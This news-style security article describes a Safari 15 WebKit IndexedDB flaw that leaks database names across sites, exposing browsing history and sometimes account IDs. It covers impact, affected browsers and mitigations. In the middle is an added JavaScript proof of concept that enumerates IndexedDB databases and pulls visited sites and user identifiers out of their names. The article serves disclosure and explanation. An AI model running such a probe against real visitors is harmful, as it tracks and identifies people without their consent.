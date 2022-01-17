



There is a flaw in the implementation of the IndexedDB API in Safari's WebKit engine that lets any website learn a user's real-time browsing activity, and in some cases user identifiers, from other sites open in the same browser session.

IndexedDB is a widely used browser API: a versatile client-side storage system with large capacity (subject to browser storage quotas, not truly unlimited).

It is typically used to cache web application data for offline use, but modules, developer tools, and browser extensions can also use it to store sensitive information.

To prevent data from leaking across sites, IndexedDB follows the same-origin policy, so that only the origin that created a database can access it.

However, FingerprintJS analysts discovered that the WebKit implementation of IndexedDB used by Safari 15 on macOS does not enforce the same-origin policy correctly, leading to the disclosure of sensitive data.

This privacy bug also affects web browsers that use the same engine on the latest iOS and iPadOS versions.

Safari 15 issues

Because of the same-origin violation, the IndexedDB implementation in Safari 15 on iOS, iPadOS, and macOS lets any website read the names of databases created by other websites during the same browsing session.

Database names are usually unique and website-specific, so leaking them is effectively leaking the user's browsing history to any site they visit.

To make matters worse, some database names embed user-specific identifiers (created after login), so the leak can also identify the user.

Impact and mitigation

According to the analysts, all it takes to identify someone through this flaw is for the user to be logged in to a popular website such as YouTube or Facebook, or to a service such as Google Calendar or Google Keep.

When the user is logged in to one of these Google services, an IndexedDB database is created with the Google User ID embedded in its name. If multiple Google accounts are in use, a separate database is created for each account.
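To make the two-stage leak concrete (database names reveal visited sites; names that embed an account identifier reveal the user), here is an added example of how a page would probe the leak and classify what it sees. This is not code from the FingerprintJS report or from WebKit. The watchlist patterns, the site names and the sample database list are constructed for illustration; they are not the real database names used by Google services or by any other site.

```javascript
// Added example: probing the Safari 15 IndexedDB name leak from a page.
// A page lists the database names visible to its origin and matches them
// against a watchlist of names known to belong to other sites.
// All patterns and sample data below are constructed, not real site names.

const WATCHLIST = [
  // Static, site-specific names reveal that the site was visited.
  { site: 'video-site.example', pattern: /^VideoSiteCache$/ },
  { site: 'social.example', pattern: /^social-feed-v\d+$/ },
  // Hypothetical per-user name: an account identifier embedded in the
  // database name turns a visited-site leak into a user-identification leak.
  { site: 'accounts.example', pattern: /^acct-(\d{8,21})$/, idGroup: 1 },
];

// Database names this page created itself; seeing these is not a leak.
const OWN_DB_NAMES = new Set(['attacker-local-cache']);

// Classify a list of database names (as returned by indexedDB.databases())
// into visited sites, recovered user identifiers and unrecognised names.
function classifyDatabaseNames(names) {
  const visited = new Set();
  const userIds = [];
  const unknown = [];
  for (const name of names) {
    if (OWN_DB_NAMES.has(name)) continue; // our own storage, not leaked
    let matched = false;
    for (const entry of WATCHLIST) {
      const m = entry.pattern.exec(name);
      if (!m) continue;
      matched = true;
      visited.add(entry.site);
      if (entry.idGroup !== undefined) {
        userIds.push({ site: entry.site, id: m[entry.idGroup] });
      }
    }
    // Unrecognised but foreign names are still browsing-history evidence.
    if (!matched) unknown.push(name);
  }
  return { visited: [...visited].sort(), userIds, unknown };
}

// Browser entry point: enumerate the names this origin can see and classify
// them. indexedDB.databases() is the enumeration API; on a correctly isolated
// browser it returns only this origin's own databases, so every foreign name
// it returns is evidence of the leak.
async function probeLeak(idb) {
  if (!idb || typeof idb.databases !== 'function') {
    return null; // enumeration not supported by this browser
  }
  const dbs = await idb.databases();
  return classifyDatabaseNames(dbs.map((d) => d.name));
}

// Constructed sample: what a leaking Safari 15 session might expose to an
// unrelated origin after the user visited two sites and logged in to a
// third with two accounts.
const SAMPLE_LEAKED_NAMES = [
  'attacker-local-cache',
  'VideoSiteCache',
  'social-feed-v3',
  'acct-1234567890123',
  'acct-9876543210987',
  'some-other-db',
];

// Stand-in for window.indexedDB so the example runs outside a browser.
const fakeIndexedDB = {
  databases: async () =>
    SAMPLE_LEAKED_NAMES.map((name) => ({ name, version: 1 })),
};

const idbSource = typeof window === 'undefined' ? fakeIndexedDB : window.indexedDB;
probeLeak(idbSource).then((result) => {
  console.log(JSON.stringify(result, null, 2));
});
```

Run under Node it classifies the constructed sample; in a browser it probes the real `indexedDB` object. The per-user pattern also shows the lesson for site developers: a database name is metadata that the browser may expose even when the contents are isolated, so keep names constant and store account identifiers inside the database rather than in its name.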

"I checked the homepages of Alexa's top 1000 most visited websites to understand how many of them use IndexedDB and can be uniquely identified by the databases they interact with," the FingerprintJS report said.

"The results show that over 30 websites interact with IndexedDB directly on their homepage, without any additional user interaction or authentication."

"This number is likely to be significantly higher in real-world scenarios, because websites can interact with databases on subpages, after specific user actions, or in the authenticated parts of the page."

In some cases, when a database with a UUID (Universally Unique Identifier) name is created by a subresource such as an embedded third-party script, Safari's tracking-prevention features intervene and block the leak. Ad-blocking extensions further enhance this incidental mitigation, since they stop many of those subresources from loading at all.

Safari 15's Private Browsing mode is also affected. Because each private session is restricted to a single tab, the amount of information exposed is smaller, but every website visited from that tab still leaks its database names to the websites visited afterwards in the same tab.

Note that this is a WebKit issue, so other browsers built on that engine (for example, Brave and Chrome on iOS) are also vulnerable.

To check whether your browser is affected, visit the researchers' demo page, which reproduces the API leak.

[Image] Safari on iPadOS 15.2 leaks browsing history (BleepingComputer)

The vulnerability was reported to the WebKit Bug Tracker on November 28, 2021, but had not been addressed at the time of writing.

One way to mitigate the issue until a security update is available is to block all JavaScript, a drastic measure that will break functionality on many web pages.

The only other viable option is to switch to a browser that is not based on WebKit, which is possible only on macOS. On iOS and iPadOS, every browser uses WebKit, so all of them are affected.

